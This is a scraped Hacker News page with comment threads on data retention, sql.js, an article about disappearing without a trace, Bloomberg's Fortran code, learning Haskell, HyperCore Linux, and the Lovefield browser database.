If you are providing something to anonymize activity- then sure, if it is legal. And you want to store as little data as possible that would be hazardous if it was made public. But for everything else, it's probably not a good idea to have this attitude.

There are many questions you don't know you need answered until you need them, and then it would be good or even necessary to have the data historically. For example, auditing changes made to the system or data, logging some requests and responses, tracking user behavior for analysis by marketing, etc. Over time, depending on the site/service, you may want all those things and more.

rdlecler1 2 days ago 0 replies      
Maybe you don't have the resources to analyze the data today, but you still need to collect it for when you do. A history of data can give you a null hypothesis to work with. When we see a drop in traffic in August, is it because we're losing relevance, or because August tends to be a slow month?
eanzenberg 3 days ago 3 replies      
Data is absolutely an asset. All decisions are driven by data (could be personal, biased, anecdotal, etc.), so why not make decisions based on more data points? It's cute to think you can "ask questions first, then collect," but this wastes time in 2015. Imagine being asked at Netflix "calculate the % watch-through of 18-21 year olds for kids movies", then a week later "for action movies in the 1980s." As opposed to having the viewing info for all your users before these questions arise.

BTW, users DO want you to use their data to improve your service. Otherwise google, facebook, twitter, netflix, etc. would not be as successful as they are. Liability only comes into play when OTHER parties access (legally or illegally) your data.
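
The kind of ad-hoc question mentioned above is a one-liner once the events are already collected. A minimal sketch with made-up viewing records (field names and numbers are invented):

```python
# Each record is one completed or abandoned viewing session.
views = [
    {"age": 19, "genre": "kids",   "watched": 0.9},
    {"age": 20, "genre": "kids",   "watched": 0.5},
    {"age": 35, "genre": "kids",   "watched": 0.8},   # outside the age band
    {"age": 21, "genre": "action", "watched": 0.4},   # wrong genre
]

def pct_watch_through(rows, lo, hi, genre):
    """Average watch-through for one age band and genre."""
    sel = [r["watched"] for r in rows
           if lo <= r["age"] <= hi and r["genre"] == genre]
    return sum(sel) / len(sel)

print(round(pct_watch_through(views, 18, 21, "kids"), 2))  # 0.7
```

Answering "for action movies in the 1980s" a week later is just another filter over the same events — no new collection needed, which is the whole point.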

readams 3 days ago 0 replies      
It's definitely an asset, but it's potentially a dangerous one. It might be like owning enriched uranium fuel pellets. Extremely valuable asset that can power a society, but dangerous if it falls into the wrong hands or is allowed to contaminate the environment.
lcnmrn 3 days ago 1 reply      
Public data is an asset. Private data is a liability.
m52go 3 days ago 0 replies      
First, hat-tip to Marko for running a business with integrity. I really like the parallel between data and finance as it relates to privacy.

As it turns out, banks have a very similar history of making promises & violating them. There are many parallels between banks & debt and data & technology.

I wrote a post titled "Silicon Valley Data is the New Wall Street Debt" that you folks may like:


yuhong 3 days ago 0 replies      
This reminds me of the RadioShack bankruptcy. I don't think the bankruptcy process was designed for "selling" personal data, right?
BinaryIdiot 3 days ago 0 replies      
I think this is a pretty good, general rule. But with everything in technology it's not true for everything. For instance auditing and medical records. Basically the only exceptions are going to be things not actionable in the market.

Good read!

Lerc 3 days ago 1 reply      
If data is a liability aren't we all worse off for knowing that?
tuananh 3 days ago 0 replies      
You make it work for you -> it's an asset. You leave it lying there doing nothing -> it's a liability.

Perspective, people.

qihqi 2 days ago 0 replies      
Well, Asset = liability + owner contribution. /s
MikeNomad 2 days ago 0 replies      
Data are an asset. Data custodians are the liability.
xcyu 3 days ago 0 replies      
crimsonalucard 3 days ago 0 replies      
luckydata 3 days ago 0 replies      
SQLite compiled into JavaScript via Emscripten github.com
197 points by sea6ear  3 days ago   55 comments top 12
rhc2104 3 days ago 4 replies      
Sql.js is awesome. It powers sqlteaching.com (on the client side), and the whole site took about 50 hours of work between my wife and me. Most of that time was on the curriculum.
SEJeff 3 days ago 0 replies      
FYI this is what powers the interactive SQL engine for the SQL classes on the Khan Academy. If you've never seen them, it is really cool.



timeu 3 days ago 0 replies      
Would be interesting to see how this benchmarks against the in-memory db of lovefield (https://github.com/google/lovefield)
myoon 3 days ago 5 replies      
Unfortunately, there are a few major downsides to sql.js:

1. Not API compatible with node-sqlite3, so you can't just drop it in and use it with knex or other wrappers.

2. Doesn't support in-place editing of a db. You have to load the entire DB into memory, modify it, and then save it back, making it unsuitable for any concurrent application.

I love the idea of the project though, and it would be awesome not to have to deal with compiling sqlite or using node-pre-gyp to build embedded chromium apps.

pygy_ 3 days ago 4 replies      
What I would love to see is a SQLite rewrite in Rust. Just enough to support WebSQL and appease Mozilla's concern about the lack of alternative implementations.
SunboX 2 days ago 1 reply      
Did someone try to compile Zebra Crossing (ZXing) to JavaScript using Emscripten? I searched a lot, but sadly didn't find anyone who succeeded. And I don't have enough knowledge about C++ to try it myself.
kgen 3 days ago 0 replies      
SQL.js is a great library -- we use it on http://sqlbolt.com/ to teach SQL right in the browser in a platform agnostic way.
cheyne 3 days ago 1 reply      
Been using this library for a while now. Works great, I based my app https://www.lightroomdashboard.com on it
seanalltogether 3 days ago 1 reply      
I wonder how well this would work for shipping game assets in the browser. One of the nice things I miss about flash was having a single compiled object to store on the server and distribute to end users which contained all the assets and sounds needed for the game. Stuffing all your assets into a sqlite database and sending that over the wire would keep everything nice and tidy.
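
The single-file bundle idea is straightforward with SQLite. A sketch using Python's sqlite3 (the asset paths and byte contents are invented; on the client you'd open the same file with sql.js): pack assets as blobs keyed by path, ship one file, look them up by name.

```python
import sqlite3

# Fake "assets" -- in practice these would be real file contents.
ASSETS = {
    "sprites/hero.png": b"\x89PNG...",
    "sounds/jump.wav": b"RIFF...",
}

# ":memory:" for the demo; a real path gives you the single shippable file.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE assets (path TEXT PRIMARY KEY, data BLOB)")
conn.executemany("INSERT INTO assets VALUES (?, ?)", ASSETS.items())

# At load time, pull an asset back out by its path.
data = conn.execute("SELECT data FROM assets WHERE path = ?",
                    ("sounds/jump.wav",)).fetchone()[0]
print(data[:4])  # b'RIFF'
```

Compared to a zip, you also get indexed lookups and the option of storing metadata columns (sizes, hashes, versions) alongside the blobs.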
inglor 2 days ago 0 replies      
I wrote an SQL injection tutorial using this a while ago: benjamingr.github.io/PizzaHack
PSeitz 2 days ago 0 replies      
I would be very interested in benchmarks comparing it to the native version
omegote 3 days ago 0 replies      
Vanishing Point: How to disappear in America without a trace (2012) skeptictank.org
183 points by QUFB  3 days ago   97 comments top 22
morganvachon 3 days ago 4 replies      
A nitpick (beyond the spelling, grammar, and punctuation errors throughout): The part about "most states in the Union require 24 hours before reporting a missing person" is nothing but a Hollywood trope. The fact is, most agencies require a missing person to be entered into their respective state's database within a few hours of the report. I can say unequivocally that Georgia has a two-hour window, as I've entered many such reports during my stint in law enforcement, and that is our state's requirement.

The reason they want to enter the person as soon as possible is so that any checks for that person's info will return a "hit" in time to locate the person. For example, George has dementia, goes for a walk at 8am, and is gone for several hours. He is reported missing at 12pm, and the police report is keyed into the state database by 1pm. At 2pm that same day, George is stopped by an officer and his information is run on the state computer. A hit shows up that states he's a missing-endangered person (endangered due to his mental state), the officer notifies his department so they can notify the family, and all is well. Now, if the bogus 24-hour rule were real, George never would have been reported the day he went missing, and perhaps would have met a grisly demise that night. Timely reporting is a potentially life-saving measure and I really wish television and the movies would stop it with that particularly dangerous bit of misinformation.

leroy_masochist 3 days ago 6 replies      
It's a really interesting topic and I'd say I was disappointed by the article for several reasons:

1. Very outdated in terms of the extent to which people hiding today would leave a digital signature. The article literally suggests leaving no available photographs of you, to the point where acquaintances have to work with a sketch artist to put your picture out.

2. Some very naive suggestions for jobs to take while on the run, including doing data entry, working as a day laborer, and joining the Peace Corps.

3. Made-up tinfoil-hat "facts". For example: "Satellites can bounce LASER light off of your windows and, by measuring the minute distance differences between a vibrating window and the satellite, reconstruct your speech -- from orbit!"

Note: this is not true. The pinnacle of laser surveillance (which is actually a real thing) is measured in the hundreds of meters.

This is actually a really cool topic, and best practices in escape and evasion are fascinating. I think the outline of a better manual would look like:

1. Figuring out where you're going to hide (best hope is bland suburb of large metro area in a far-away country where you're not ethnically unusual....e.g., Sao Paulo, Lagos, Taipei, or a frontier market that attracts a lot of expats, e.g., Mongolia, Nairobi, Manila). Additional discussion of extradition law and whether you should prioritize non-extradition countries relative to your country of citizenship. Additional discussion of how to learn the language and culture of your new home without attracting attention.

2. Figuring out how you're going to survive in your new life; refinement of potential destinations based on skill set, age, life goals, etc.

3. Prepping your new life (surreptitiously creating bank accounts, documents, contacts in new residence).

4. Making the break; how to disappear so that authorities classify you as missing and presumed dead.

5. Forensic considerations (facial recognition, DNA, voiceprint, fingerprints, digital signature).

Would be great to hear others' thoughts on what such a manual would look like, I love to nerd out on this kind of stuff.

epalm 3 days ago 3 replies      
reality_czech 2 days ago 0 replies      
"I wish you the very best and hope that some of these suggestions and contact references prove helpful though most of it, I'm afraid, is probably unworkable, silly suggestions that won't help you one bit"

So the author himself admits that this is a bunch of silly nonsense that won't help you at all. For some inexplicable reason the article continues past this point.

thrownaway2424 2 days ago 1 reply      
I really enjoyed this article just because it reminds me so much of the early internet: wall-to-wall libertarian derangement. UCC 1-207. Sovereign Citizenship. And it got slashdotted by this link. Really takes me back.
ryanlol 3 days ago 2 replies      
Certainly an interesting writing style:

>Remove the radiator filler cap if the engine is cold. (Opening the cap with the engine hot can get you badly burned. The fluid can start to boil once the pressure is relieved and spray all over you. The fluid will be quite painful resulting in first and second-degree burns. It's not likely to be disfiguring but if you accidentally burn yourself, you can very well go ahead with your plan to escape however your mind might be focused entirely upon the pain and not upon escape. With the engine cold you don't have to worry about getting burned.)

That certainly seems like a rather elaborate way of explaining that touching hot things burns.

akallio9000 2 days ago 0 replies      
When I read his description of "radiator fluid" and dumping gravel into the oil fill of a car, I began to have my doubts, but when he suggested that a revolver with the cylinder swung out might still have a bullet in the chamber, all doubts that he didn't know what he was talking about were erased.
Tloewald 2 days ago 1 reply      
I wish it were organized in terms of utility relative to difficulty. Walking everywhere with a hat and buzz cut to avoid shedding hair is kind of insane and is more likely to attract attention than prevent you from being tracked by your DNA.
mirimir 2 days ago 1 reply      
Although it's quite dated, I'm willing to accept the author's claim that he originated much of the "how to disappear" stuff. And so I'd love to give him my $5. But perhaps ironically, Smashwords (the bookseller) only accepts PayPal and credit/debit cards. However, if some kind person would gift it to me, I would reimburse the price via Bitcoins :)
boomskats 3 days ago 1 reply      
"If you plan on going into hiding and want to leave a big hint, consider buying a copy of this book from the author immediately beforehand"
WillyNourson 2 days ago 1 reply      
I love this thing because if you remove the first four points, it's just a good how-to about life in general. Actually if you follow these rules you may never have to vanish:

- Discard your old life.
- Limit the resolve and resources of your opposition.
- Run from your opposition (and your old life.)
- Hide from your opposition.

- Make new friends.
- Acquire a (new) identity. (Legal papers: Birth record, Social Security #)
- Find gainful employment.
- Pay your taxes.
- Get medical, life, and automotive insurance.
- Get a credit card -- and keep it paid up.
- Perhaps take college courses to learn a new marketable skill.
- Acquire and maintain respectability in your community.
- Find a wife or husband: Make a (new) family.
- Don't drink heavily, don't use any illegal drugs, don't do any crimes.
- Die with dignity.

pp19dd 3 days ago 5 replies      
Rather interesting, though the scope is limited to the USA alone.

Supposing you make your way out of USA, a good solution for restarting your life is to join the French Foreign Legion. They'll take recruits from 17.5 - 39.5 years old. No questions asked, for a year. You literally start with a new name, an assumed identity which is a sign-up requirement. Their tagline is "the school of second chance."

You get fed, you get training, you get a salary. If in that year you do well, learn the language, learn soldiering, progress, you can get French citizenship. After the first year, you can either continue your career under your assumed identity, or reconcile your issues with your country of origin.


V-2 2 days ago 0 replies      
Lovely, but my favorite is http://www.wikihow.com/Survive-Living-Through-a-Coup reportedly from a person who's survived quite a few back in the day.

"Has your country's dictator been overthrown? Did he seem fatherly and protective or just overbearing and threatening? Are you feeling confused as to what to feel? Have you exchanged one bad situation for another? Has the military decided they know better how to run things? If any of these things apply to you, you'll find yourself in a country in turmoil and it's time to think about your immediate survival needs."

It contains plenty of seasoned, golden advice, eg.

"Don't panic. The worst thing to do in any situation is to panic."

As well as some useful guidelines on how to deal with harsh political reality of a revolution:

"If there are more than one party up for vote, request time with them to see what they believe in. Pick the one that more closely fits with your values."

tired_man 3 days ago 0 replies      
Good thoughts, where they stayed on the topic. Too much political commentary for me.
guizzy 2 days ago 1 reply      
On one hand the author says that if you're running from a crime you will get caught. But then he gives tips to escape from someone with the resources and determination to have skin samples from hotel rooms analysed and access to thermal imaging satellites.

Looks to me like the author doesn't know what people would be running from. I doubt the authorities would use LASER SURVEILLANCE SATELLITES for anything they intend to pursue with less zeal than a very serious felony.

xacaxulu 2 days ago 0 replies      
I would start from the other side and learn about how surveillance works, and the numerous forms of SigInt/HumInt that can grab you anywhere. If you want to disappear but you still want to use credit cards, a smart phone, drive around in a car or log in to regular websites (social media for sure) from the same computer, I question your dedication :-)
jzwinck 2 days ago 0 replies      
If you want to disappear, maybe you should do it in a place other than America, so that you will not need to so thoroughly marginalize yourself (panning for gold?!).
MrJagil 2 days ago 0 replies      
This linked video is very interesting: https://www.youtube.com/watch?v=YxpUc8lj-CY
zw123456 2 days ago 0 replies      
This reminds me very much of Breaking Bad when Walter went to the "vacuum cleaner" who hid him in a cabin in the woods and had to follow many of the rules outlined in this article.
Simulacra 3 days ago 0 replies      
Actually have you ever been to an Ikea alone? You can get pretty lost..
Cub3 3 days ago 0 replies      
PhantomGremlin 2 days ago 0 replies      
I'm surprised that nobody has mentioned a very infamous person who disappeared for many years. Whitey Bulger.[1]

All it takes is friends and money.

[1] https://en.wikipedia.org/wiki/Whitey_Bulger#Fugitive

Bloomberg Runs on 25M lines of Fortran (2006) etrading.wordpress.com
160 points by charlieirish  3 days ago   148 comments top 30
apaprocki 3 days ago 4 replies      
Sigh. Bloomberg-er here -- this article is old. There is certainly a lot of Fortran remaining in sections (you don't rewrite working code with C linkage in another language just because -- you rewrite it if you have something to gain), but it is nowhere near as bad as this old article makes it sound. Many teams are C++ only and have been for a long time (see our open-source code on GH for a sample). Keep in mind that if you deal in absolute numbers you are missing the bigger picture -- the actual real number will be much smaller and it will be an even smaller percentage of the total codebase.

edit: Can mods put (2006) in the title? Seems reasonable...

radmuzom 3 days ago 13 replies      
The article seems to assume that there is something "wrong" with running on 25M lines of Fortran. It does not provide any technical reason why Fortran is not the right tool for the job. Why does this need to be "Web 2.0"?
ig1 3 days ago 2 replies      
(In a previous life I worked at Bloomberg)

I don't remember the exact figures but 25m lines of Fortran seems plausible, but it was still the minority of the code base. The majority at the time was in C and C++, with probably a few million lines of Perl and Javascript as well.

Plenty of the Fortran dates from the 80s; rewriting it in a modern language would be a huge project with lots of risks and limited upside. No significant new Fortran has been written for a long long time (>10 years).

It's also a mistake to think of Bloomberg as a single piece of software; it's closer to an app store. There are thousands of specialist apps (functions in Bloomberg terminology) and most users only use half-a-dozen, but which half-a-dozen varies significantly between users.

This makes it very hard to displace wholesale. There are individual pieces a competitor can go after but identifying a subset of functionality that's enough to convince users to switch is hard.

There's also a lot of stickiness which goes beyond pure functionality. Network effect and brand are also key parts (having a Bloomberg Terminal is a status symbol).

PaulHoule 3 days ago 1 reply      
I have been looking at some projects at Bloomberg from the outside, and even though the projects are interesting I don't think I'd want to work there because of bureaucracy and inertia -- it's the kind of place where you'd need to get approval to install a text editor on your machine.

I have found that often "high profits" get in the way of customer service because they are a disincentive to "quality is free" thinking and make it possible to sustain the unsustainable for way too long.

To take an example, cable companies are so profitable that they think nothing of the cost of replacing cable boxes that break, or of excessive truck rolls. These not only cost money but they anger consumers. My mother-in-law quit cable in disgust and switched to OTA TV after she had three cable boxes burn out in three months and would have to go stand in a long line to return it and pick up a new one.

Quality is free and screwing up is expensive -- even if you can afford to screw up it costs you customers and it costs you employees. But again, turnover is no problem if you are making enough money you can afford to spend 5x what things should really cost.

bradleyankrom 3 days ago 1 reply      
It's a lot of C++ today. In fact, they have open-sourced a lot of the in-house tools they use, eg bde: https://github.com/bloomberg/bde
drglitch 3 days ago 2 replies      
BBG's competitive advantage is not data - in fact, it's pretty mediocre. Any reasonably large player sources their own data feeds due to too many holes in the former.

BBG's killer features are support and _chat_ - chat with other _trusted_ counterparties who also paid the admission price.

beezle 3 days ago 0 replies      
It would have been interesting to know if they are using Fortran 95 or the more recent (and very modern) 2003. People who like to beat on Fortran rarely know that it has evolved quite a bit since '66 and '77
matthewaveryusa 3 days ago 1 reply      
I worked at bberg for 4 years. Changed about 2 lines of Fortran code. Some people do more, others do less, but the norm is you'll spend a sliver of your time in Fortran.

Great place to work, too bad it's in NYC

baldfat 3 days ago 0 replies      
A little Wikipedia information:

Market share has grown since this was written in 2006.

Market share was 26% in 2007 and 30% in 2011.

Money: 315,000 Bloomberg Terminal subscribers (2-year subscriptions) worldwide at $20,000 per user = 6.3 BILLION dollars a year!

EDITED for spelling

smanzer 3 days ago 0 replies      
Unhappy academic here - codebases with millions of lines of Fortran are very prevalent here as well. It is both better and worse than a lot of people think; like a lot of the other comments said, that code is rarely touched, but when you do need to touch it, it can be very painful. Modifying old Fortran is rough, mostly because of that awful, awful IMPLICIT keyword. Though I will say that the native multidimensional array support does make certain sections much easier to read than corresponding vanilla C code.
edu 3 days ago 0 replies      
The article is from 2006; that should be noted in the title. And does anybody know if the situation is still the same?
stevoo 3 days ago 0 replies      
I have to disagree with the idea of a company actually coming in and taking out everything that Bloomberg has been building these past years. This is an extremely hard market to get into. Bloomberg is extremely dedicated at what they do and they do not take competition lightly. They do use their massive power to make the life of competition as hard as they can.

As for Bloomberg, their terminal and all of the services that they provide are top notch. I have a lot of friction with all of their data, and this is by far the best I have worked with.

monopolemagnet 3 days ago 1 reply      
By comparison, this is 33% more LoC than a BWR/PWR nuclear reactor (Monte Carlo method / quadruple integral equivalent) simulator product formerly known as CORETRAN-01.
pma 3 days ago 7 replies      
Bloomberg terminal and Thomson Reuters are certainly ripe for strong competitors. They have basically operated as monopolies for decades. YC, developers and others should take on this challenge. http://www.nytimes.com/2015/09/10/business/dealbook/the-bloo...
melling 3 days ago 5 replies      
This article is from 2006. I imagine something has changed in 9 years.
zimbatm 3 days ago 1 reply      
When the compiler code size is a fraction of the whole it would actually make sense to improve on it instead of rewriting everything. Like Facebook did for PHP and their HHVM. Obviously Fortran doesn't have a speed problem but it could be improved in other ways like static analysis and nicer syntax notations.
shitgoose 3 days ago 0 replies      
In Fortran one can add two matrices: A=B+C. Try it in C++ (NumPy is better that way, but still this is an extension to a rocky foundation). The amount of freely available high quality math/statistical libraries for Fortran is unmatched. Why in the world would you give up on this just because you can use a Google account? Google Payments for settlement?? WTF? Settlement is a bit more than a credit card charge or moving money between checking accounts. Google Finance as a ticker plant?? Yea, right. Even Yahoo provides options data; Google has just basic stock prices. Compare it with BBG that has everything. Build a terminal in WebKit? Why???

Every time I see suggestions like this, I remember minions, rushing from one framework to another - "koonga la mala makuna, koonga!".

jamesrom 3 days ago 0 replies      
And there are 6 million rivets in the Sydney Harbour Bridge.
josephmx 3 days ago 1 reply      
This reads a bit like the old "Google will rule the world!" blog posts, doesn't it?
tempodox 3 days ago 0 replies      
I don't know how comparable this is, but JaneStreet seem to be quite happy with OCaml. I for one would give that some consideration before actually going C++. And that's ignoring the question why they would depart from Fortran in the first place.
USNetizen 3 days ago 0 replies      
People would be really surprised how much of the critical infrastructure of this country in government and enterprise runs on technologies around half a century old. This is nothing new. The IRS still uses millions of lines of COBOL to process our tax returns, the VA uses millions of lines of MUMPS (M) to store and process health and benefits records, and the list goes on and on. It's not going anywhere soon, either.

People skilled in these legacy languages and technology stacks are also amongst the highest paid and most in-demand in the country, at least here on the east coast in places like New York and DC.

oneJob 3 days ago 0 replies      
Just read the article. Yeah, a Bloomberg terminal does a lot (a lot alot) more than scroll "news tickers, checking Bloomberg email, and trading." When the author suggests that Google might make a play for market share (or some other Web 2.0 player), it is clear that there is an enormous lack of understanding as to exactly what Bloomberg is, as a product.
eb0la 3 days ago 0 replies      
I thought Fortran programmers are more expensive than C++ ones, but itjobsearch.co.uk says they aren't.

Fortran programmer: 45,000 GBP (3-month avg), +23% salary change from last year

C++ programmers: between 47K GBP and 100K (for C++ quants). With 3-5% average salary change from year to year.

I don't know Fortran; but looks like the fame about its high costs comes from mainframe hardware (which also runs C++, btw).

crb002 3 days ago 0 replies      
Bloomberg can write a one page Python flask/bottle wrapper around any of that Fortran and serve it up as a microservice. They got Pang Ko from Mathworks, who is one of the top parallel computing data structure minds in the world. I'm betting Bloomberg will be around until another player like JP disrupts the market with a truly distributed trading platform.
anonu 3 days ago 0 replies      
I didn't notice the "2006" in the title until I read that the terminal cost a grand a month! I thought something was off!! Bloomberg Terminal costs more like $2k/month per user nowadays... maybe more??
meerita 3 days ago 0 replies      
I know Bloomberg is the Kraken of the software out there, but I wonder how many lines it would be in other languages?
spacecowboy_lon 3 days ago 0 replies      
Only 1500 coders? I recall hearing at British Telecom, "oh, we need to put an extra 800 developers on a single product."
allenwlee 3 days ago 0 replies      
In my mind, Markit is the biggest future threat to Bloomberg
1971genocide 3 days ago 1 reply      

How can you trivially conclude that it would be easy to provide the same speed as the Bloomberg terminal?

If I am not mistaken even shaving off fractions in terms of time has a lot of value.

And maybe you need 25 million lines of FORTRAN code to achieve that efficiency?

vasche 3 days ago 1 reply      
What I Wish I Knew When Learning Haskell stephendiehl.com
192 points by andars  1 day ago   53 comments top 12
skimpycompiler 1 day ago 1 reply      
What I still do not know and always wished to know when I learned Haskell was how to write efficient code easily. I wrote huge projects with thousands of lines knowing nothing about C++ execution model and had insanely fast code (that could have been made even faster - but I was not that kind of expert) but with Haskell I have to be an expert to really write code that is as performant as something that would take me much less time to write in C/C++.

Just writing simple efficient matrix multiplication is a pain. It took me a couple of days to write a working quicksort.

I couldn't find any resources that provide a very serious introduction to optimizing Haskell code.

I found out way too late in my adventures with Haskell that Monad Transformers and similar abstractions have a significant runtime overhead and aren't free, I thought I was just playing with types that won't get in the way when the code compiles.

No one seems to cover this aspect of Haskell.
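A concrete instance of the gap the parent describes is accumulator strictness, usually the first lesson in any Haskell optimization guide. The sketch below (assuming GHC and its base library) shows the lazy fold that builds a thunk chain versus the strict alternatives:

```haskell
{-# LANGUAGE BangPatterns #-}
import Data.List (foldl')

-- Lazy foldl accumulates a chain of unevaluated (+) thunks,
-- which can exhaust the stack on large inputs.
sumLazy :: [Int] -> Int
sumLazy = foldl (+) 0

-- foldl' forces the accumulator at each step, so it runs in
-- constant space.
sumStrict :: [Int] -> Int
sumStrict = foldl' (+) 0

-- Bang patterns make strictness explicit in hand-written loops.
mean :: [Double] -> Double
mean xs = go 0 0 xs
  where
    go !s !n []      = if n == 0 then 0 else s / fromIntegral n
    go !s !n (x:rest) = go (s + x) (n + 1) rest

main :: IO ()
main = print (sumStrict [1..1000000], mean [1, 2, 3, 4])
-- prints (500000500000,2.5)
```

This is only one corner of the topic (the parent's point about monad-transformer overhead is a separate, deeper issue), but it illustrates why profiling and strictness annotations are where most "serious introductions" would have to start.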

jack9 1 day ago 4 replies      
So before learning Haskell, you wished you had already known over 325 pages of what? That seems like a motivation to not try to learn it at all.
greenyoda 1 day ago 1 reply      
Readers may be interested in the extensive comments from when this article was posted in previous years:


theophrastus 1 day ago 5 replies      
Syntax. Of the dozen languages I've taught myself (which is a super-set of the half dozen I've used to write significant things), Haskell's syntax has been, and remains, the largest barrier for me (and this includes Perl!). For example, just a clear equivalence, like this one given by the very helpful linked article here, would've helped enormously ("sugared form" for monad):

 do { a <- f ; m }
 f >>= \a -> do { m }
Sometimes I think the authors of Haskell had a completely different glyph set. I'm sure some of you folks can read this like a book, but this sort of thing still throws me into the ditch:

 liftM2 :: (Monad m) => (a1 -> a2 -> r) -> m a1 -> m a2 -> m r
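That last signature is `liftM2` from `Control.Monad` (the `lift` prefix appears to have been clipped in the page extraction). A minimal sketch of both puzzles, worked in the Maybe monad:

```haskell
import Control.Monad (liftM2)

-- The sugared and desugared forms are the same computation.
sugared :: Maybe Int
sugared = do { a <- Just 2; b <- Just 3; return (a + b) }   -- Just 5

desugared :: Maybe Int
desugared = Just 2 >>= \a -> Just 3 >>= \b -> return (a + b)  -- Just 5

-- liftM2 lifts a pure two-argument function into any monad:
-- liftM2 :: Monad m => (a1 -> a2 -> r) -> m a1 -> m a2 -> m r
lifted :: Maybe Int
lifted = liftM2 (+) (Just 2) (Just 3)                         -- Just 5

main :: IO ()
main = mapM_ print [sugared, desugared, lifted]
```

Read `m a1` as "a monadic action producing an `a1`"; the scary signature just says liftM2 turns a plain function of two arguments into one that runs two actions and combines their results.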

mark_l_watson 23 hours ago 1 reply      
The author covers cabal sandbox, which I used until recently when I converted my few Haskell projects to use stack. I was really happy with stack until a few days ago when I tried to add some old Haskell code to a new yesod web app. Dependency hell that took a while to sort out.

This article discussed getting everything working and then doing a cabal freeze which is something I hadn't seen before. I would like to be able to simply update a project to new library versions but maybe I should drop that desire. Any advice?

erik14th 23 hours ago 0 replies      
Would add stackage[0] as first item if it was my list.


okasaki 20 hours ago 0 replies      
I wish I hadn't bothered learning Haskell. I spent years thinking I was an idiot because I struggled and failed to make any even moderately complex programs. Now I'm using C++ and things are so much easier. I think leaving Haskell feels like leaving an abusive partner who always puts you down.
chrisra 1 day ago 0 replies      
"All of Haskell"
mijoharas 1 day ago 1 reply      
What I wish I knew now that I know Haskell: Where I can find Haskell jobs that aren't in banking! I have grown a love of the language through using it, but I don't know how to find many job positions that aren't either in banking or research.
danellis 1 day ago 1 reply      
Is he kidding with that title-text-as-an-image? I was going to C&P it into an IM, but nope.
Kenji 1 day ago 2 replies      
My desire to be productive is at odds with my appreciation for Haskell. Don't get me wrong, I love the language, it's elegant, absolutely awesome (apart from whitespaces with semantic meaning). But sometimes I feel like the language, despite its expressiveness, is like a tight straitjacket. And then I just write some JavaScript or Java or C++ or PHP and feel so much freer.
harry8 1 day ago 4 replies      
pandoc, shellcheck and xmonad. Is this still the list of things you can install that were written in Haskell and are used for something that isn't writing Haskell code?
HyperCore Linux: A tiny portable Linux designed for reproducibility hyperos.io
184 points by jimmcslim  3 days ago   49 comments top 11
ramLlama 3 days ago 1 reply      
I like this idea, but I do not really understand who it is aimed at. The focus seems to be on reproducibility of scientific experiments and code, which is great! Many existing code artifacts are WOGSL (Works On Graduate Student's Laptop) which is the CS equivalent of "runs when parked".

So, let's break down the fields of CS for which this should be applicable:

* Systems: This won't work except for the few systems projects that are entirely in-RAM AND will work on tinycore's kernel version

* ML: This, I can see, especially with the seeming focus on dataset management. Much ML is compute-bound and the overhead of using the FUSE FS's is hopefully negligible.

So, is this focused on ML and ML-using code and experiments? If so, I think that should be clarified. I think a lot of systems folk will be (rightly or wrongly) turned away from it due to the seeming overhead of the various hyper* extensions. Not to mention that they are all written in Node/JS (Again, rightly or wrongly, many systems folk will not want to run their stuff on platforms written in JS)

I like the direction this project can go, but there seems to be a lack of focus or direction in your mission right now.

trengrj 3 days ago 1 reply      
I was hoping this was going to be a Linux distro built reproducibly (as in same binary builds given same compiler toolchain) but was disappointed.
0x006A 3 days ago 1 reply      
> sudo linux boot

 /usr/local/lib/node_modules/linux/cli.js:60
   fs.accessSync(keyPath)
      ^
 TypeError: Object #<Object> has no method 'accessSync'

dingdingdang 3 days ago 2 replies      
What speed stats would people be getting with this..? The idea of Node managing a hypervisor linux VM somehow seems unrealistic in performance terms - but I might be hugely prejudiced on this so who knows.
bananaoomarang 3 days ago 4 replies      
`npm install linux`
falcolas 3 days ago 0 replies      
Seems like a competitor for Vagrant as much as anything else. Given the ubiquity of VirtualBox and the portability of its images, that seems like the tool it will most be compared to.

That or docker toolbox.

voltagex_ 2 days ago 1 reply      
coherentpony 2 days ago 0 replies      
Also check out NixOS if you want a bona fide Linux distribution: http://nixos.org/
weavie 3 days ago 1 reply      
For the first time in quite a while I am actually tempted to update my mac to Yosemite. It isn't explicit, but I am fairly certain it won't work in older versions of osx.
0x006A 3 days ago 2 replies      
why is this using npm and not brew?
__gcmurphy 3 days ago 2 replies      
Lovefield A relational database for web apps google.github.io
198 points by dumindunuwan  3 days ago   55 comments top 15
mzarate06 3 days ago 5 replies      
From the first 1 minute and 15 seconds of the video:

> "With WebSQL being deprecated, and IndexedDB not providing structured queries, web developers need a tool to satisfy their structured query needs."

> "Web app developers need structured queries to work in the mobile world."

> "With IndexedDB ... there's a steeeep learning curve to make it useful for your app. Moreover, IndexedDB does not provide structured queries."

> "IndexedDB does not offer structured query features, such as sorting by multiple columns, or joining the results of multiple tables."

As someone that looked forward to WebSQL, this is painful to hear. Many of us realized the above from the beginning. Yet, some in the standards committee found a way to shoot down WebSQL, w/vague rationale such as "we don't feel it's the best path for the web".

Well, thank you. Instead of giving us one of the most well-tested SQL implementations (SQLite) that addresses all of the above, and much more, we were handed a harder to use, more verbose, and less powerful alternative (IndexedDB). And as a result, we're having to implement our own relational databases. In JavaScript. 4-5 years later.

No offense to Lovefield, but it represents everything wrong w/the decision to deprecate WebSQL and implement IndexedDB instead. It was also the single decision that most made me lose faith in the standards committee.

sgrove 3 days ago 0 replies      
Another database which has similar characteristics (although not quite sql-like api's) that I've had a lot of luck with is https://github.com/tonsky/datascript. Bit of a tangent, but anyone looking for this kind of functionality might be interested.
jdimov9 3 days ago 5 replies      
What is a browser database and what is it good for? Would you use one instead of a back-end DB or in conjunction with one? How? Why? Why is this on 1st page - what is cool about it?

I'm clearly missing something, but I can't be bothered to watch the videos - can someone TL;DR it for me, please.

amelius 3 days ago 3 replies      
What happens when the user opens two tabs, both of which try to access the same local database?
stephen 3 days ago 1 reply      
Interesting. At first I was thinking this might be part of their cross-platform (iOS/Android/web) architecture that they use for Inbox, Sheets, and a few other things.

E.g. they assert that, despite having pure-native views (e.g. no Swing-style "one UI for all platforms"), they share ~70% of the client-side code across iOS/Android/web.

Which to me insinuates the reused code is probably things like the domain models, validation rules, and also online/offline data storage/sync logic.

E.g. maybe Lovefield was part of that cross-platform client-side storage architecture. But probably not since it's Javascript. (Which is fine, Google is a big place/lots of different apps/needs.)

rw2 3 days ago 0 replies      
This is good for people used to SQL but I personally find the way that IndexedDB stores data to be superior. You just have to get used to the NoSQL way of persisting objects. Making one technology look like another is never efficient for an app.
olegp 3 days ago 0 replies      
